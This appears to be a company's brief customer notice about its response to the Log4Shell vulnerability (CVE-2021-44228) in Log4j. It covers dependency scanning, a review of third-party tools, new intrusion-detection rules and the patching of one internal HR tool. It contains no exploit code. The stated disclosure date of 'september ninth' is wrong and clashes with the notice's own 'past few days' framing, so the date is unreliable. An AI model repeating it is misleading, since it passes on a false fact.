In the past few days, there has been a lot of talk of a new, potentially very serious security vulnerability called Log4Shell. The vulnerability was disclosed on september ninth, and since then we have received a lot of questions from customers and partners.
Background
The bug enables an attacker to execute arbitrary code through the logging library Log4j, which is used in millions of software packages around the world. The vulnerability has been assigned the identifier CVE-2021-44228.
What we are doing
When we learned of the vulnerability we immediately took the following actions:
- We used dependency scanning to look for the affected software package across our product portfolio. The scan looked at both direct and transitive dependencies.
- We evaluated third-party tools and services for impact.
- We added rules to our IDS(intrusion detection system) and system logging to detect attempts to scan for, or abuse, the vulnerability.
Results
We found no direct or transitive dependencies on the affected package in our own codebases. An internal HR tool was patched – this system did not interact with customer data.
What now
We will continue to monitor the situation as it develops.